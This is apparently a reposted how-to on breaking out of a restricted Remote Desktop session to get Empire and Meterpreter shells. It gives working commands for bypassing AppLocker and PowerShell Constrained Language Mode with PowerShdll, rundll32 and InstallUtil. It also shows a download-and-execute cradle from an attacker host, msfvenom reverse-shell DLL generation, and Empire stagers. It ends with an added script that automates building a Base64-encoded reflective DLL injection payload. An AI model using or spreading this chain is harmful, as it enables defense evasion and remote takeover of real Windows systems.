How to get an Empire shell from Remote Desktop Services

2025-02-24 Update. From: SLTechnology News&Howtos (shulou), Development


Shulou (Shulou.com) 06/02 Report

Getting an Empire shell out of a locked-down Remote Desktop Services session is not obvious if you have not done it before. This article summarizes the restrictions you run into (AppLocker, PowerShell Constrained Language Mode, Windows Defender) and the workarounds for each.

The scenario: the only access to the target is through Remote Desktop Services (RDS), AppLocker is enforced, and PowerShell runs in Constrained Language Mode, which blocks most of the usual PowerShell tradecraft (arbitrary .NET types, Add-Type, reflection-based loaders). Windows Defender is a second obstacle that also has to be dealt with.

Environmental requirements:

The RDS server allows outbound traffic on port 80.

.NET v3.5 (required for PowerShdll's DLL mode).

Note: powershell.exe is not PowerShell itself. It is only a host process that loads the assembly containing the PowerShell engine, System.Management.Automation.dll, and handles its I/O. Any process that can load that assembly can run PowerShell, which is what the rundll32 trick below relies on.

For more background, see the links referenced throughout this article.

Getting a shell from Notepad on RDS

https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/

https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

In the Notepad menu bar, select Help -> View Help. This opens Internet Explorer.

In IE, right-click any link and choose Save target as..., saving it as lol.ps1 on your desktop.

Click View downloads in IE, open the drop-down next to the file and choose Open with -> Notepad. Replace the file's content with the single line powershell.exe and save it again.

Now right-click a link in IE once more and choose Save target as.... In the save dialog's Save as type drop-down, select All Files so that the saved .ps1 file is shown, then right-click it and choose Run with PowerShell. A PowerShell console pops up, but it is in Constrained Language Mode. You can verify this with the automatic variable $ExecutionContext.SessionState.LanguageMode, which returns ConstrainedLanguage.

Bypassing PowerShell Constrained Language Mode

First, download PowerShdll from https://github.com/p3nt4/PowerShdll and host PowerShdll.dll on the Kali web server with python -m SimpleHTTPServer 80. Then open http://10.7.253.10/PowerShdll.dll in IE and save it as PowerShdll.dll (any folder will do). C:\Windows\Tasks is a good location for bypassing AppLocker because the default rules allow everything under C:\Windows while this subfolder is writable by normal users. Navigating to a folder may also be restricted, however, so in some cases you will have to save it to C:\Users\Username\Desktop instead.

I'm not sure how to check DLL rules in an AppLocker-controlled environment.

Now change the PowerShell prompt's working directory to the desktop and run the DLL with rundll32:

rundll32 .\PowerShdll.dll,main -w

A new interactive PowerShell prompt should pop up. Check $ExecutionContext.SessionState.LanguageMode again: it now reports FullLanguage.
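As an added example (it is not from the original post or from PowerShdll), the following PowerShell snippet runs the checks this section depends on before choosing a bypass: it reports the language mode, shows what Constrained Language Mode actually blocks, lists the effective AppLocker rule collections (including the Dll collection, which answers the question of where DLL rules can be inspected), and probes whether the two candidate drop folders are writable. It assumes the built-in AppLocker module is present and relies on the RuleCollections, RuleCollectionType, EnforcementMode, Action and Name properties of the policy objects it returns; everything else is plain cmdlet and operator use, which Constrained Language Mode permits, so it can be pasted into the restricted prompt itself.

```powershell
# Added example, not part of the original post: triage the restrictions from inside the RDS prompt.
# Only cmdlets, operators and property reads are used, so it also runs under ConstrainedLanguage.

# 1. Which language mode are we in? FullLanguage, ConstrainedLanguage, RestrictedLanguage or NoLanguage.
$mode = $ExecutionContext.SessionState.LanguageMode
"Language mode: $mode"

# 2. Constrained Language Mode only allows a small set of core .NET types. New-Object on anything
#    else (e.g. Net.WebClient) throws, which is why the usual download cradle fails until the
#    mode is bypassed. Probe it instead of guessing.
try {
    $null = New-Object System.Net.WebClient
    "New-Object Net.WebClient: allowed"
} catch {
    "New-Object Net.WebClient: blocked ($($_.Exception.Message))"
}

# 3. Read the effective AppLocker policy (local + domain) and list every rule collection.
#    Assumed property names: RuleCollections, RuleCollectionType, EnforcementMode, Action, Name.
#    A Dll collection with EnforcementMode=Enabled means DLL rules are live; NotConfigured means
#    only the Exe/Script/Msi collections matter for the rundll32 approach.
try {
    $policy = Get-AppLockerPolicy -Effective -ErrorAction Stop
    foreach ($collection in $policy.RuleCollections) {
        "{0} collection: EnforcementMode={1}, {2} rule(s)" -f $collection.RuleCollectionType,
            $collection.EnforcementMode, @($collection).Count
        foreach ($rule in $collection) {
            "  [{0}] {1}" -f $rule.Action, $rule.Name
        }
    }
} catch {
    "Get-AppLockerPolicy failed (module missing or access denied): $($_.Exception.Message)"
}

# 4. Which of the usual drop folders can we actually write to? C:\Windows\Tasks is covered by the
#    default "all files under the Windows folder" allow rule; the desktop is the fallback.
foreach ($dir in @('C:\Windows\Tasks', "$env:USERPROFILE\Desktop")) {
    $probe = Join-Path $dir ('probe_{0}.tmp' -f (Get-Random))
    try {
        Set-Content -Path $probe -Value 'x' -ErrorAction Stop
        Remove-Item -Path $probe -ErrorAction SilentlyContinue
        "$dir : writable"
    } catch {
        "$dir : not writable"
    }
}
```

Run it first in the constrained prompt and again after the rundll32 step: the language mode line should change from ConstrainedLanguage to FullLanguage, and the New-Object probe from blocked to allowed, which confirms the bypass worked before you spend a stager on it.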

A simpler way

It wasn't until later that I found out that I could have omitted the last two steps. Just generate an Empire stager with set Base64 false and set OutFile shell. Then, in the unrestricted PowerShell, download the stager and execute it directly in memory:

IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.18/shell');

If you are lucky, Defender will not flag it and you will get an Empire agent.

Getting a Meterpreter shell

Generate a DLL payload:

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.2 lport=8081 -f dll -o msf.dll

Set up the Metasploit listener with the same payload, host and port:

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 8081
exploit

Download msf.dll with the IE Save target as... trick from before.

For some reason, Windows Defender didn't intercept my payload. Maybe it's because the x64 payload's signature has not been recognized by Defender as malware; I don't know exactly.

Now execute the DLL with rundll32. rundll32 is used because it is a Microsoft-signed Windows binary that the default AppLocker rules allow, so it will not be blocked:

rundll32 .\msf.dll,Control_RunDLL

This yields a Meterpreter session.

Empire without powershell.exe

Assume you have an established Metasploit session.

In Empire, create a listener and a stager. The important part is set Base64 false, which stops the stager from invoking powershell.exe. Because of the constrained language mode, powershell.exe cannot be used here.

uselistener http
set Host 10.7.253.18
set Port 4444
execute
back
usestager multi/launcher
set Base64 false
generate

Now, in the Meterpreter session, load the PowerShell extension and open an interactive shell:

load powershell
powershell_shell

Paste the generated Empire launcher into this interactive PowerShell shell; an agent should then check in to Empire.

More advanced techniques

Bypassing PowerShell Constrained Language Mode and AppLocker

The following article covers bypassing application whitelisting and constrained PowerShell and is worth reading:

https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell

1. Use windows/hta to generate a listener and an HTA stager.

2. Open the ReflectivePick project in Visual Studio. Paste the Base64 HTA stager in place and compile the DLL as ReflectivePick_x64.dll.

3. Use the following PowerShell commands to Base64-encode the DLL and write the result to a text file:

$Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte
$Encoded = [System.Convert]::ToBase64String($Content)
$Encoded | Out-File "C:\Windows\Tasks\dll.txt"

4. Paste the contents of dll.txt into a new variable appended to Invoke-ReflectivePEInjection.ps1:

$dllData = "DLLBASE64_GOES_HERE"
$ProcId = (Get-Process explorer).Id
$Bytes = [System.Convert]::FromBase64String($dllData)
Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId

5. Base64-encode the entire script (for example with https://www.base64encode.org/). Open the Bypass project in Visual Studio, paste the encoded content into the encoded variable and compile it as Bypass.exe.

6. Execute Bypass.exe through installutil.exe, which is a trusted .NET binary that AppLocker allows by default:

Set-Location \\tsclient\lkylabs
Copy-Item .\Bypass.exe C:\Windows\Tasks
cd C:\Windows\Tasks
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
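As an added example, not part of the original post or of the ReflectivePick, Bypass or PowerSploit projects, the following PowerShell script automates steps 3 to 5 above on the build machine: it Base64-encodes the DLL, checks that the encoding round-trips and that the file really is a PE, appends the injection stub to Invoke-ReflectivePEInjection.ps1, and Base64-encodes the resulting script for the Bypass project. File paths, the output file name encoded.txt and the function names are hypothetical; the script assumes Invoke-ReflectivePEInjection.ps1 (PowerSploit's) is in the current directory and that the Bypass project expects the UTF-8 Base64 form, which is what base64encode.org produces by default.

```powershell
# Added example, not from the original post. Automates steps 3-5: encode the DLL, build the
# injector script, encode the whole script. Paths and function names are hypothetical.

function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    # ReadAllBytes works on both Windows PowerShell 5.1 and PowerShell 7, unlike
    # Get-Content -Encoding Byte (5.1 only) or -AsByteStream (7 only).
    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    [System.Convert]::ToBase64String($bytes)
}

function New-InjectorScript {
    param(
        [Parameter(Mandatory)][string]$DllPath,
        [Parameter(Mandatory)][string]$InjectorPath,   # Invoke-ReflectivePEInjection.ps1
        [string]$TargetProcess = 'explorer'             # host process, as in step 4
    )
    $original = [System.IO.File]::ReadAllBytes((Resolve-Path $DllPath).Path)

    # Sanity checks before embedding: a non-PE or truncated file would only fail at injection time.
    if ($original.Length -lt 2 -or $original[0] -ne 0x4D -or $original[1] -ne 0x5A) {
        throw "$DllPath does not start with an MZ header; is it really the compiled DLL?"
    }
    $dllB64 = ConvertTo-Base64File -Path $DllPath
    $roundTrip = [System.Convert]::FromBase64String($dllB64)
    if ($roundTrip.Length -ne $original.Length) { throw 'Base64 round-trip length mismatch' }

    # Step 4: append the stub from the article to the injector script. Select -First 1 guards
    # against several explorer.exe instances, which would make -ProcId receive an array.
    $injector = Get-Content -Path $InjectorPath -Raw
    $stub = @"
`$dllData = "$dllB64"
`$ProcId = (Get-Process $TargetProcess | Select-Object -First 1).Id
`$Bytes = [System.Convert]::FromBase64String(`$dllData)
Invoke-ReflectivePEInjection -PEBytes `$Bytes -ProcId `$ProcId
"@
    return $injector + "`r`n" + $stub
}

function ConvertTo-Base64Script {
    param([Parameter(Mandatory)][string]$Script)
    # UTF-8 matches the online encoder used in step 5. Use [Text.Encoding]::Unicode instead if
    # the consumer is powershell.exe -EncodedCommand, which expects UTF-16LE.
    [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($Script))
}

# Usage (hypothetical paths): produce encoded.txt for pasting into the Bypass project.
$script  = New-InjectorScript -DllPath .\ReflectivePick_x64.dll -InjectorPath .\Invoke-ReflectivePEInjection.ps1
$encoded = ConvertTo-Base64Script -Script $script
Set-Content -Path .\encoded.txt -Value $encoded -NoNewline
'Injector script: {0} characters, encoded: {1} characters' -f $script.Length, $encoded.Length
```

Keep an eye on the size reported at the end: a 64-bit DLL grows by a third when Base64-encoded and then by another third when the whole script is encoded, so a large payload may exceed what the Bypass project's string variable or the compiler is comfortable with.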
